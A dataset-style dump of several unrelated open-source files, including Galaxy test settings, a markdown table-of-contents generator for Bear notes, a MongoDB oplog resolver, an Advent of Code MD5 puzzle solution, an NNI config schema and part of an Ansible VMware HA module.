] | 1,000 | 2015-02-18T16:18:10.000Z | 2022-03-29T08:22:56.000Z | import os
from typing import Optional
DEFAULT_GALAXY_MASTER_API_KEY = "TEST123"
DEFAULT_GALAXY_USER_API_KEY = None
DEFAULT_TEST_USER = "user@bx.psu.edu"
DEFAULT_ADMIN_TEST_USER = "test@bx.psu.edu"
DEFAULT_OTHER_USER = "otheruser@bx.psu.edu" # A second user for API testing.
TEST_USER = os.environ.get("GALAXY_TEST_USER_EMAIL", DEFAULT_TEST_USER)
ADMIN_TEST_USER = os.environ.get("GALAXY_TEST_ADMIN_USER_EMAIL", DEFAULT_ADMIN_TEST_USER)
OTHER_USER = os.environ.get("GALAXY_TEST_OTHER_USER_EMAIL", DEFAULT_OTHER_USER)
def get_admin_api_key() -> str:
"""Test admin API key to use for functional tests.
This key should be configured as a admin API key and should be able
to create additional users and keys.
"""
for key in ["GALAXY_CONFIG_MASTER_API_KEY", "GALAXY_CONFIG_OVERRIDE_MASTER_API_KEY"]:
value = os.environ.get(key, None)
if value:
return value
return DEFAULT_GALAXY_MASTER_API_KEY
def get_user_api_key() -> Optional[str]:
"""Test user API key to use for functional tests.
If set, this should drive API based testing - if not set an admin API key will
be used to create a new user and API key for tests.
"""
return os.environ.get("GALAXY_TEST_USER_API_KEY", DEFAULT_GALAXY_USER_API_KEY)
| 35.416667 | 89 | 0.751373 |
ace95cc30a088384105d49286ed0b25b0f1d25d5 | 14,283 | py | Python | markdowntoc/markdowntoc.py | aflaisler/markdown-github-bear-toc | 5f4625f2cddbf9bece076b5a99a08c5b0b178c4b | [
"MIT"
] | null | null | null | markdowntoc/markdowntoc.py | aflaisler/markdown-github-bear-toc | 5f4625f2cddbf9bece076b5a99a08c5b0b178c4b | [
"MIT"
] | null | null | null | markdowntoc/markdowntoc.py | aflaisler/markdown-github-bear-toc | 5f4625f2cddbf9bece076b5a99a08c5b0b178c4b | [
"MIT"
] | null | null | null | # encoding=utf-8
# python3.6
import sqlite3
import os
from os import path
import re
import argparse
from urllib.parse import quote
import datetime as dt
from dateutil.relativedelta import relativedelta
HOME = os.getenv('HOME', '')
bear_db = path.join(HOME, 'Library/Group Containers/9K33E3U3T4.net.shinyfrog.bear/Application Data/database.sqlite')
parser = argparse.ArgumentParser(description='Markdown Table of Contents Generator for Bear or Github', add_help=False)
parser.add_argument('--help', action='help',
help='Show this help message and exit')
parser.add_argument('name', nargs='+', type=str,
help='Bear Note UUID, Bear Note Title, Bear Note Tag, or Markdown file')
parser.add_argument('-h', '--header-priority', type=int, dest='header_priority', default=3,
help='(Default: 3) Maximum Header Priority/Strength to consider as Table of Contents')
parser.add_argument('-t', '--type', type=str.lower, dest='type', choices=['gitlab', 'github', 'bear'], default='github',
help='(Default: github) Github Anchors or Bear Anchors')
parser.add_argument('--no-write', dest='write', action='store_false',
help='Whether or not write Table of Contents to file or note automatically or output to the console.\
Add this flag to TURN OFF the automatic writing.')
parser.add_argument('-toc', '--table-of-contents-style', dest='toc', default='# Table of Contents',
help='(Default: \'# Table of Contents\') Table of Contents Style')
parser.set_defaults(write=True)
args = parser.parse_args()
params = vars(args)
if (params['type'] == 'bear'):
conn = sqlite3.connect(bear_db)
conn.row_factory = sqlite3.Row
cursor = conn.cursor()
def get_notes_from_bear():
"""
Returns all Bear Notes specified which have specified title or UUID.
"""
# Get all Unarchived notes from Bear
read_query = "SELECT * FROM `ZSFNOTE` WHERE `ZTRASHED` LIKE '0' AND `ZARCHIVED` LIKE '0'"
notes = cursor.execute(read_query)
def match_title_uuid_tag(note):
note_tags = get_tags_in_note(note['ZTEXT'])
for query in params['name']:
if query in note_tags or query == note['ZTITLE'] or query == note['ZUNIQUEIDENTIFIER']:
return True
return False
return list(filter(lambda note: match_title_uuid_tag(note), notes))
def get_tags_in_note(md_text):
"""
Returns a set of tags that exist in the note using the RegEx. Tags are elements that are preceeded by '#'.
"""
# First, ignore all code blocks since our regex is unable to handle it
text_no_code = []
lines_iter = iter(md_text.splitlines())
in_code_block = False
for line in lines_iter:
if line.startswith('```'):
in_code_block = not in_code_block
if not in_code_block:
text_no_code.append(line)
text_no_code = '\n'.join(text_no_code)
# Match all tags
# Positive Lookbehind 1: Start of character
# Positive Lookbehind 2: newline character or ' ' (needs to be separate cause Python only takes fixed-length lookbehinds)
# Group 1: Starts with '#' and ends with '#' as long as middle is not '#' or a newline character (#tags#)
# Group 2: Starts with '#' and is not succeeded by a '#', ' ', or newline character (#tags)
# We need two groups because '#tags#' can have spaces where '#tags' cannot
tag_matches = re.findall(r'((?<=^)|(?<=\n|\r| ))(#[^#\r\n]+#|#[^#\r\n ]+)', text_no_code, re.MULTILINE)
tag_matches = map(lambda match: match[1], tag_matches) # Second Capture Group
return set(tag_matches)
def has_table_of_contents(md_text):
"""
Return True or False whether or not a Table of Contents header already exists in the given Markdown text.
"""
return re.search(r'^#+\sTable\sof\sContents', md_text, re.IGNORECASE | re.MULTILINE) is not None
def get_headers(md_text, max_priority):
"""
Retrieves a list of header, priority pairs in a given Markdown text.
Format: (Header Title, Priority)
"""
lines_iter = iter(md_text.splitlines())
# Skip the first line because it's the Title
next(lines_iter)
# List of Tuples: (Header Title, Number of #)
header_priority_pairs = []
in_code_block = False
for line in lines_iter:
if line.startswith('```'):
in_code_block = not in_code_block
elif not in_code_block and line.startswith('#') and ' ' in line:
md_header, header_title = line.split(' ', 1)
# Check if md_header has all '#'
if md_header != md_header[0] * len(md_header):
continue
# Check if md_header is of lower priority than listed
if len(md_header) > max_priority:
continue
if header_title.lower() != 'table of contents' and len(header_title) > 1:
header_priority_pairs.append((header_title, len(md_header)))
return sequentialize_header_priorities(header_priority_pairs)
def sequentialize_header_priorities(header_priority_pairs):
"""
In a case where a H3 or H4 succeeds a H1, due to the nature of the Table of Contents generator\
which adds the number of tabs corresponding to the header priority/strength, this will sequentialize\
the headers such that all headers have a priority of atmost 1 more than their preceeding header.
[('Header 1', 1), ('Header 3', 3), ('Header 4', 4)] -> [('Header 1', 1), ('Header 2', 2), ('Header 3', 3)]
"""
# Go through each header and and if we see a pair where the difference in priority is > 1, make them sequential
# Ex: (H1, H3) -> (H1, H2)
for i in range(len(header_priority_pairs) - 1):
header, priority = header_priority_pairs[i]
next_header, next_priority = header_priority_pairs[i + 1]
if (next_priority - priority > 1):
header_priority_pairs[i + 1] = (next_header, priority + 1)
return header_priority_pairs
def create_bear_header_anchor(header_title, note_uuid):
"""
Returns a markdown anchor of a Bear x-callback-url to the header.
"""
header_title_url_safe = quote(header_title)
return '[{}](bear://x-callback-url/open-note?id={}&header={})'.format(header_title, note_uuid, header_title_url_safe)
def create_github_header_anchor(header_title):
"""
Returns a Github Markdown anchor to the header.
"""
return '[{}](#{})'.format(header_title, header_title.strip().replace(' ', '-'))
def create_gitlab_header_anchor(header_title):
"""
Returns a Gitlab Markdown anchor to the header.
"""
return '[{}](#{})'.format(header_title, header_title.lower().strip().replace(' ', '-'))
def create_table_of_contents(header_priority_pairs, note_uuid=None):
"""
Returns a list of strings containing the Table of Contents.
"""
if len(header_priority_pairs) == 0:
return None
bullet_list = [params['toc']]
highest_priority = min(header_priority_pairs, key=lambda pair: pair[1])[1]
for header, priority in header_priority_pairs:
md_anchor = create_bear_header_anchor(header, note_uuid) if params['type'] == 'bear' \
else create_github_header_anchor(header) if params['type'] == 'github' \
else create_gitlab_header_anchor(header)
bullet_list.append('\t' * (priority - highest_priority) + '* ' + md_anchor)
# Specifically for Bear add separator
if params['type'] == 'bear':
bullet_list.append('---')
return bullet_list
def create_table_of_contents_bear():
"""
Read Bear Notes and returns list of (Original Text, Table of Contents List) and list of note UUIDs.
"""
notes = get_notes_from_bear()
md_text_toc_pairs = []
uuids = []
for row in notes:
title = row['ZTITLE']
md_text = row['ZTEXT'].rstrip()
uuid = row['ZUNIQUEIDENTIFIER']
# creation_date = row['ZCREATIONDATE']
# modified = row['ZMODIFICATIONDATE']
if has_table_of_contents(md_text):
print('[WARNING]: \'{}\' already has a Table of Contents, Ignoring...'.format(title))
continue
header_list = get_headers(md_text, params['header_priority'])
table_of_contents_lines = create_table_of_contents(header_list, uuid)
if table_of_contents_lines is None:
print('[WARNING]: \'{}\' has no headers to create a Table of Contents, Ignoring...'.format(title))
continue
if (params['write']):
print('Creating a Table of Contents for \'{}\''.format(title))
md_text_toc_pairs.append((md_text, table_of_contents_lines))
uuids.append(uuid)
return md_text_toc_pairs, uuids
def create_table_of_contents_github_or_gitlab():
"""
Read from file and returns list of (Original Text, Table of Contents List).
"""
md_text_toc_pairs = []
valid_filepaths = []
for filepath in params['name']:
name, ext = path.splitext(filepath)
if ext.lower() != '.md':
print('[WARNING]: {} is not a Markdown File, Ignoring...'.format(filepath))
continue
try:
with open(filepath, 'r') as file:
md_text = file.read()
if has_table_of_contents(md_text):
print('[WARNING]: {} already has a Table of Contents, Ignoring...'.format(filepath))
continue
header_list = get_headers(md_text, params['header_priority'])
table_of_contents_lines = create_table_of_contents(header_list)
if table_of_contents_lines is None:
print('[WARNING]: {} has no headers to create a Table of Contents, Ignoring...'.format(filepath))
continue
if (params['write']):
print('Creating a Table of Contents for \'{}\''.format(filepath))
md_text_toc_pairs.append((md_text, table_of_contents_lines))
valid_filepaths.append(filepath)
except OSError:
print('[ERROR]: {} doesn\'t exist or cannot be read, Ignoring...'.format(filepath))
return md_text_toc_pairs, valid_filepaths
def find_note_contents_start(md_text_lines):
"""
Some notes in Bear contain #tags near the title. This returns the index in the list that\
isn't the title or contains tags. If no index found, return len(md_text_lines)
"""
# Start at 1 to skip the title
# Look for regex matches of tags and if lines from the top contain tags, then skip
for i in range(1, len(md_text_lines)):
if re.search(r'((?<=^)|(?<=\n|\r| ))(#[^#\r\n]+#|#[^#\r\n ]+)', md_text_lines[i]) is None:
return i
return len(md_text_lines)
def convert_bear_timestamp(datetime=dt.datetime.now()):
"""For some weird reason Bear's timestamps are 31 years behind, so this returns 'datetime' - 31 years as a Unix Timestamp."""
return (datetime - relativedelta(years=31)).timestamp()
def main():
md_text_toc_pairs = None
identifiers = None # Either Bear Note UUIDs or File Paths
if (params['type'] == 'bear'):
md_text_toc_pairs, identifiers = create_table_of_contents_bear()
elif (params['type'] == 'github'):
md_text_toc_pairs, identifiers = create_table_of_contents_github_or_gitlab()
for i, (md_text, toc_lines) in enumerate(md_text_toc_pairs):
if (params['write']):
# Inject Table of Contents (Title, \n, Table of Contents, \n, Content)
text_list = md_text.splitlines()
content_start = find_note_contents_start(text_list)
updated_text_list = [*text_list[:content_start], '', *toc_lines, '', *text_list[content_start:]]
# Regex extracts anchor text from ancho
# NOTE: There are edge cases with code blocks, bold, strikethroughs, etc...
subtitle_text = re.sub(r'\[([^\[\]]+)\]\([^\(\)]+\)', r'\1', ' '.join(updated_text_list[1:]))
updated_md_text = '\n'.join(updated_text_list)
if (params['type'] == 'bear'):
# Update Note with Table of Contents
update_query = "UPDATE `ZSFNOTE` SET `ZSUBTITLE`=?, `ZTEXT`=?, `ZMODIFICATIONDATE`=? WHERE `ZUNIQUEIDENTIFIER`=?"
cursor.execute(update_query, (subtitle_text, updated_md_text, convert_bear_timestamp(), identifiers[i]))
conn.commit()
elif (params['type'] == 'github'):
# Update File
with open(identifiers[i], 'w') as file:
file.write(updated_md_text)
else:
print('\n'.join(toc_lines) + '\n')
if __name__ == '__main__':
main()
if params['type'] == 'bear' and params['write']:
print('==================== [DONE] ====================')
print('[WARNING]: There still might be syncing issues with iCloud, for a precautionary measure, edit the note again.')
print('To see your changes, please restart Bear!')
conn.close()
# DEPRECATED
# def create_header_list(header_priority_pairs):
# # Base Case
# if (len(header_priority_pairs) == 0):
# return []
#
# header_list = []
# current_header = None
# current_priority = None
# current_subheaders = []
#
# # Go through each header and check if the header's priority is greater than the next's
# for i in range(len(header_priority_pairs) - 1):
# header, priority = header_priority_pairs[i]
# next_header, next_priority = header_priority_pairs[i + 1]
#
# if current_header is None:
# current_header = header
# current_priority = priority
#
# # Append Sub-header
# current_subheaders.append(header_priority_pairs[i + 1])
#
# # If we see a same ranked header (H1 and H1) or reaches the end
# if current_priority == next_priority or i + 1 == len(header_priority_pairs) - 1:
# header_list.append((current_header, create_header_list(current_subheaders)))
#
# # Reset Current Header
# current_header = None
# current_priority = None
# current_subheaders = []
#
# return header_list
| 37.986702 | 129 | 0.636981 |
ace95e78ffe24e7909528c9e784e49039bbb59ab | 6,392 | py | Python | mongodb/mongodb_consistent_backup/official/mongodb_consistent_backup/Oplog/Resolver/Resolver.py | smthkissinger/docker-images | 35e868295d04fa780325ada4168381f1e80e8fe4 | [
"BSD-3-Clause"
] | 63 | 2018-02-04T03:31:22.000Z | 2022-03-07T08:27:39.000Z | mongodb/mongodb_consistent_backup/official/mongodb_consistent_backup/Oplog/Resolver/Resolver.py | smthkissinger/docker-images | 35e868295d04fa780325ada4168381f1e80e8fe4 | [
"BSD-3-Clause"
] | 3 | 2020-06-15T03:41:03.000Z | 2020-06-15T03:41:04.000Z | mongodb/mongodb_consistent_backup/official/mongodb_consistent_backup/Oplog/Resolver/Resolver.py | smthkissinger/docker-images | 35e868295d04fa780325ada4168381f1e80e8fe4 | [
"BSD-3-Clause"
] | 40 | 2018-01-22T16:31:16.000Z | 2022-03-08T04:40:42.000Z | import logging
# Skip bson in requirements , pymongo provides
# noinspection PyPackageRequirements
from bson.timestamp import Timestamp
from copy_reg import pickle
from multiprocessing import Pool, TimeoutError
from types import MethodType
from ResolverThread import ResolverThread
from mongodb_consistent_backup.Common import MongoUri
from mongodb_consistent_backup.Errors import Error, OperationError
from mongodb_consistent_backup.Oplog import OplogState
from mongodb_consistent_backup.Pipeline import Task
# Allows pooled .apply_async()s to work on Class-methods:
def _reduce_method(m):
if m.im_self is None:
return getattr, (m.im_class, m.im_func.func_name)
else:
return getattr, (m.im_self, m.im_func.func_name)
pickle(MethodType, _reduce_method)
class Resolver(Task):
def __init__(self, manager, config, timer, base_dir, backup_dir, tailed_oplogs, backup_oplogs):
super(Resolver, self).__init__(self.__class__.__name__, manager, config, timer, base_dir, backup_dir)
self.tailed_oplogs = tailed_oplogs
self.backup_oplogs = backup_oplogs
self.compression_supported = ['none', 'gzip']
self.resolver_summary = {}
self.resolver_state = {}
self.running = False
self.stopped = False
self.completed = False
self._pool = None
self._pooled = []
self._results = {}
self.threads(self.config.oplog.resolver.threads)
try:
self._pool = Pool(processes=self.threads())
except Exception, e:
logging.fatal("Could not start oplog resolver pool! Error: %s" % e)
raise Error(e)
def close(self):
if self._pool and self.stopped:
logging.debug("Stopping all oplog resolver threads")
self._pool.terminate()
logging.info("Stopped all oplog resolver threads")
self.stopped = True
def get_backup_end_max_ts(self):
end_ts = None
for shard in self.backup_oplogs:
instance = self.backup_oplogs[shard]
if 'last_ts' in instance and instance['last_ts'] is not None:
last_ts = instance['last_ts']
if end_ts is None or last_ts > end_ts:
end_ts = last_ts
return end_ts
def get_consistent_end_ts(self):
end_ts = None
bkp_end_ts = self.get_backup_end_max_ts()
for shard in self.tailed_oplogs:
instance = self.tailed_oplogs[shard]
if 'last_ts' in instance and instance['last_ts'] is not None:
last_ts = instance['last_ts']
if end_ts is None or last_ts < end_ts:
end_ts = last_ts
if last_ts < bkp_end_ts:
end_ts = bkp_end_ts
return Timestamp(end_ts.time + 1, 0)
def done(self, done_uri):
if done_uri in self._pooled:
logging.debug("Resolving completed for: %s" % done_uri)
self._pooled.remove(done_uri)
else:
raise OperationError("Unexpected response from resolver thread: %s" % done_uri)
def wait(self, max_wait_secs=6 * 3600, poll_secs=2):
if len(self._pooled) > 0:
waited_secs = 0
self._pool.close()
while len(self._pooled):
logging.debug("Waiting for %i oplog resolver thread(s) to stop" % len(self._pooled))
try:
for thread_name in self._pooled:
thread = self._results[thread_name]
thread.get(poll_secs)
except TimeoutError:
if waited_secs < max_wait_secs:
waited_secs += poll_secs
else:
raise OperationError("Waited more than %i seconds for Oplog resolver! I will assume there is a problem and exit")
def run(self):
try:
logging.info("Resolving oplogs (options: threads=%s, compression=%s)" % (self.threads(), self.compression()))
self.timer.start(self.timer_name)
self.running = True
for shard in self.backup_oplogs:
backup_oplog = self.backup_oplogs[shard]
self.resolver_state[shard] = OplogState(self.manager, None, backup_oplog['file'])
uri = MongoUri(backup_oplog['uri']).get()
if shard in self.tailed_oplogs:
tailed_oplog = self.tailed_oplogs[shard]
if backup_oplog['last_ts'] is None and tailed_oplog['last_ts'] is None:
logging.info("No oplog changes to resolve for %s" % uri)
elif backup_oplog['last_ts'] > tailed_oplog['last_ts']:
logging.fatal(
"Backup oplog is newer than the tailed oplog! This situation is unsupported. Please retry backup")
raise OperationError("Backup oplog is newer than the tailed oplog!")
else:
thread_name = uri.str()
logging.debug("Starting ResolverThread: %s" % thread_name)
self._results[thread_name] = self._pool.apply_async(ResolverThread(
self.config.dump(),
self.resolver_state[shard],
uri,
tailed_oplog.copy(),
backup_oplog.copy(),
self.get_consistent_end_ts(),
self.compression()
).run, callback=self.done)
self._pooled.append(thread_name)
else:
logging.info("No tailed oplog for host %s" % uri)
self.wait()
self.completed = True
logging.info("Oplog resolving completed in %.2f seconds" % self.timer.duration(self.timer_name))
except Exception, e:
logging.error("Resolver failed for %s: %s" % (uri, e))
raise e
finally:
self.timer.stop(self.timer_name)
self.running = False
self.stopped = True
for shard in self.resolver_state:
self.resolver_summary[shard] = self.resolver_state[shard].get()
return self.resolver_summary
| 41.777778 | 137 | 0.581352 |
ace960e11ee3abd4f5e18ce9c586091b0055bb4e | 2,450 | py | Python | 2015/python/day-04.py | tadhg-ohiggins/advent-of-code | d0f113955940e69cbe0953607f62862f8a8bb830 | [
"CC0-1.0"
] | 1 | 2021-12-04T18:09:44.000Z | 2021-12-04T18:09:44.000Z | 2015/python/day-04.py | tadhg-ohiggins/advent-of-code | d0f113955940e69cbe0953607f62862f8a8bb830 | [
"CC0-1.0"
] | null | null | null | 2015/python/day-04.py | tadhg-ohiggins/advent-of-code | d0f113955940e69cbe0953607f62862f8a8bb830 | [
"CC0-1.0"
] | null | null | null | import hashlib
from tutils import partial
from tutils import count
from tutils import Any
from tutils import compose_left
""" END HELPER FUNCTIONS """
DAY = "04"
INPUT, TEST = f"input-{DAY}.txt", f"test-input-{DAY}.txt"
TA1 = None
TA2 = None
ANSWER1 = 282749
ANSWER2 = 9962624
def process_one(data: str) -> int:
return findzeroes(data, "00000")
def findzeroes(key, target):
myhash = partial(mkhash, key)
lazy_hashes = partial(map, myhash)
find_match = partial(filter, lambda x: x[1].startswith(target))
generator = compose_left(lazy_hashes, enumerate, find_match)(count())
match = next(generator)
return match[0]
def xfindzeroes(key, target):
# This original is rather more readable than the functional version...
i, hsh = 0, ""
while not hsh.startswith(target):
i = i + 1
hsh = mkhash(key, i)
return i
def mkhash(key, num):
md5hash = hashlib.md5()
md5hash.update(f"{key}{str(num)}".encode())
return md5hash.hexdigest()
def process_two(data: Any) -> Any:
return findzeroes(data, "000000")
def cli_main() -> None:
data = "yzbqklnj"
answer_one = process_one(data)
assert answer_one == ANSWER1
print("Answer one:", answer_one)
answer_two = process_two(data)
assert answer_two == ANSWER2
print("Answer two:", answer_two)
if __name__ == "__main__":
cli_main()
"""
--- Day 4: The Ideal Stocking Stuffer ---
Santa needs help mining some AdventCoins (very similar to bitcoins) to use as
gifts for all the economically forward-thinking little girls and boys.
To do this, he needs to find MD5 hashes which, in hexadecimal, start with at
least five zeroes. The input to the MD5 hash is some secret key (your puzzle
input, given below) followed by a number in decimal. To mine AdventCoins, you
must find Santa the lowest positive number (no leading zeroes: 1, 2, 3, ...)
that produces such a hash.
For example:
If your secret key is abcdef, the answer is 609043, because the MD5 hash of
abcdef609043 starts with five zeroes (000001dbbfa...), and it is the lowest
such number to do so.
If your secret key is pqrstuv, the lowest number it combines with to make
an MD5 hash starting with five zeroes is 1048970; that is, the MD5 hash of
pqrstuv1048970 looks like 000006136ef....
Your puzzle answer was 282749.
--- Part Two ---
Now find one that starts with six zeroes.
Your puzzle answer was 9962624.
"""
| 26.06383 | 79 | 0.699184 |
ace9621a5abcb3661411ef69ff74e05610153515 | 3,739 | py | Python | tools/nnicmd/config_schema.py | xwyangjshb/nni | 1388d763b203cf9da9b747f06d8f1700679bd7d1 | [
"MIT"
] | 1 | 2018-10-14T03:37:19.000Z | 2018-10-14T03:37:19.000Z | tools/nnicmd/config_schema.py | xwyangjshb/nni | 1388d763b203cf9da9b747f06d8f1700679bd7d1 | [
"MIT"
] | null | null | null | tools/nnicmd/config_schema.py | xwyangjshb/nni | 1388d763b203cf9da9b747f06d8f1700679bd7d1 | [
"MIT"
] | null | null | null | # Copyright (c) Microsoft Corporation
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge,
# to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os
from schema import Schema, And, Use, Optional, Regex, Or
common_schema = {
'authorName': str,
'experimentName': str,
Optional('description'): str,
'trialConcurrency': And(int, lambda n: 1 <=n <= 999999),
Optional('maxExecDuration'): Regex(r'^[1-9][0-9]*[s|m|h|d]$'),
Optional('maxTrialNum'): And(int, lambda x: 1 <= x <= 99999),
'trainingServicePlatform': And(str, lambda x: x in ['remote', 'local', 'pai']),
Optional('searchSpacePath'): os.path.exists,
Optional('multiPhase'): bool,
'useAnnotation': bool,
'tuner': Or({
'builtinTunerName': Or('TPE', 'Random', 'Anneal', 'Evolution', 'SMAC', 'BatchTuner'),
'classArgs': {
'optimize_mode': Or('maximize', 'minimize'),
Optional('speed'): int
},
Optional('gpuNum'): And(int, lambda x: 0 <= x <= 99999),
},{
'codeDir': os.path.exists,
'classFileName': str,
'className': str,
Optional('classArgs'): dict,
Optional('gpuNum'): And(int, lambda x: 0 <= x <= 99999),
}),
Optional('assessor'): Or({
'builtinAssessorName': lambda x: x in ['Medianstop'],
'classArgs': {
'optimize_mode': lambda x: x in ['maximize', 'minimize']},
'gpuNum': And(int, lambda x: 0 <= x <= 99999)
},{
'codeDir': os.path.exists,
'classFileName': str,
'className': str,
Optional('classArgs'): dict,
Optional('gpuNum'): And(int, lambda x: 0 <= x <= 99999),
}),
}
common_trial_schema = {
'trial':{
'command': str,
'codeDir': os.path.exists,
'gpuNum': And(int, lambda x: 0 <= x <= 99999)
}
}
pai_trial_schema = {
'trial':{
'command': str,
'codeDir': os.path.exists,
'gpuNum': And(int, lambda x: 0 <= x <= 99999),
'cpuNum': And(int, lambda x: 0 <= x <= 99999),
'memoryMB': int,
'image': str,
Optional('dataDir'): Regex(r'hdfs://(([0-9]{1,3}.){3}[0-9]{1,3})(:[0-9]{2,5})?(/.*)?'),
Optional('outputDir'): Regex(r'hdfs://(([0-9]{1,3}.){3}[0-9]{1,3})(:[0-9]{2,5})?(/.*)?')
}
}
pai_config_schema = {
'paiConfig':{
'userName': str,
'passWord': str,
'host': str
}
}
machine_list_schima = {
Optional('machineList'):[Or({
'ip': str,
'port': And(int, lambda x: 0 < x < 65535),
'username': str,
'passwd': str
},{
'ip': str,
'port': And(int, lambda x: 0 < x < 65535),
'username': str,
'sshKeyPath': os.path.exists,
Optional('passphrase'): str
})]
}
LOCAL_CONFIG_SCHEMA = Schema({**common_schema, **common_trial_schema})
REMOTE_CONFIG_SCHEMA = Schema({**common_schema, **common_trial_schema, **machine_list_schima})
PAI_CONFIG_SCHEMA = Schema({**common_schema, **pai_trial_schema, **pai_config_schema}) | 33.684685 | 100 | 0.651244 |
ace9632d036f35e0d6a05f25ad7b982356165947 | 23,740 | py | Python | lib/python3.8/site-packages/ansible_collections/community/vmware/plugins/modules/vmware_cluster_ha.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | null | null | null | lib/python3.8/site-packages/ansible_collections/community/vmware/plugins/modules/vmware_cluster_ha.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | null | null | null | lib/python3.8/site-packages/ansible_collections/community/vmware/plugins/modules/vmware_cluster_ha.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2015, Joseph Callen <jcallen () csc.com>
# Copyright: (c) 2018, Ansible Project
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = r'''
---
module: vmware_cluster_ha
short_description: Manage High Availability (HA) on VMware vSphere clusters
description:
- Manages HA configuration on VMware vSphere clusters.
- All values and VMware object names are case sensitive.
author:
- Joseph Callen (@jcpowermac)
- Abhijeet Kasurde (@Akasurde)
requirements:
- Tested on ESXi 5.5 and 6.5.
- PyVmomi installed.
options:
cluster_name:
description:
- The name of the cluster to be managed.
type: str
required: true
datacenter:
description:
- The name of the datacenter.
type: str
required: true
aliases: [ datacenter_name ]
enable_ha:
description:
- Whether to enable HA.
type: bool
default: false
ha_host_monitoring:
description:
- Whether HA restarts virtual machines after a host fails.
- If set to C(enabled), HA restarts virtual machines after a host fails.
- If set to C(disabled), HA does not restart virtual machines after a host fails.
- If C(enable_ha) is set to C(False), then this value is ignored.
type: str
choices: [ 'enabled', 'disabled' ]
default: 'enabled'
ha_vm_monitoring:
description:
- State of virtual machine health monitoring service.
- If set to C(vmAndAppMonitoring), HA response to both virtual machine and application heartbeat failure.
- If set to C(vmMonitoringDisabled), virtual machine health monitoring is disabled.
- If set to C(vmMonitoringOnly), HA response to virtual machine heartbeat failure.
- If C(enable_ha) is set to C(False), then this value is ignored.
type: str
choices: ['vmAndAppMonitoring', 'vmMonitoringOnly', 'vmMonitoringDisabled']
default: 'vmMonitoringDisabled'
host_isolation_response:
description:
- Indicates whether or VMs should be powered off if a host determines that it is isolated from the rest of the compute resource.
- If set to C(none), do not power off VMs in the event of a host network isolation.
- If set to C(powerOff), power off VMs in the event of a host network isolation.
- If set to C(shutdown), shut down VMs guest operating system in the event of a host network isolation.
type: str
choices: ['none', 'powerOff', 'shutdown']
default: 'none'
slot_based_admission_control:
description:
- Configure slot based admission control policy.
- C(slot_based_admission_control), C(reservation_based_admission_control) and C(failover_host_admission_control) are mutually exclusive.
suboptions:
failover_level:
description:
- Number of host failures that should be tolerated.
type: int
required: true
type: dict
reservation_based_admission_control:
description:
- Configure reservation based admission control policy.
- C(slot_based_admission_control), C(reservation_based_admission_control) and C(failover_host_admission_control) are mutually exclusive.
suboptions:
failover_level:
description:
- Number of host failures that should be tolerated.
type: int
required: true
auto_compute_percentages:
description:
- By default, C(failover_level) is used to calculate C(cpu_failover_resources_percent) and C(memory_failover_resources_percent).
If a user wants to override the percentage values, he has to set this field to false.
type: bool
default: true
cpu_failover_resources_percent:
description:
- Percentage of CPU resources in the cluster to reserve for failover.
Ignored if C(auto_compute_percentages) is not set to false.
type: int
default: 50
memory_failover_resources_percent:
description:
- Percentage of memory resources in the cluster to reserve for failover.
Ignored if C(auto_compute_percentages) is not set to false.
type: int
default: 50
type: dict
failover_host_admission_control:
description:
- Configure dedicated failover hosts.
- C(slot_based_admission_control), C(reservation_based_admission_control) and C(failover_host_admission_control) are mutually exclusive.
suboptions:
failover_hosts:
description:
- List of dedicated failover hosts.
type: list
required: true
elements: str
type: dict
ha_vm_failure_interval:
description:
- The number of seconds after which virtual machine is declared as failed
if no heartbeat has been received.
- This setting is only valid if C(ha_vm_monitoring) is set to, either C(vmAndAppMonitoring) or C(vmMonitoringOnly).
- Unit is seconds.
type: int
default: 30
ha_vm_min_up_time:
description:
- The number of seconds for the virtual machine's heartbeats to stabilize after
the virtual machine has been powered on.
- Valid only when I(ha_vm_monitoring) is set to either C(vmAndAppMonitoring) or C(vmMonitoringOnly).
- Unit is seconds.
type: int
default: 120
ha_vm_max_failures:
description:
- Maximum number of failures and automated resets allowed during the time
that C(ha_vm_max_failure_window) specifies.
- Valid only when I(ha_vm_monitoring) is set to either C(vmAndAppMonitoring) or C(vmMonitoringOnly).
type: int
default: 3
ha_vm_max_failure_window:
description:
- The number of seconds for the window during which up to C(ha_vm_max_failures) resets
can occur before automated responses stop.
- Valid only when I(ha_vm_monitoring) is set to either C(vmAndAppMonitoring) or C(vmMonitoringOnly).
- Unit is seconds.
- Default specifies no failure window.
type: int
default: -1
ha_restart_priority:
description:
- Priority HA gives to a virtual machine if sufficient capacity is not available
to power on all failed virtual machines.
- Valid only if I(ha_vm_monitoring) is set to either C(vmAndAppMonitoring) or C(vmMonitoringOnly).
- If set to C(disabled), then HA is disabled for this virtual machine.
- If set to C(high), then virtual machine with this priority have a higher chance of powering on after a failure,
when there is insufficient capacity on hosts to meet all virtual machine needs.
- If set to C(medium), then virtual machine with this priority have an intermediate chance of powering on after a failure,
when there is insufficient capacity on hosts to meet all virtual machine needs.
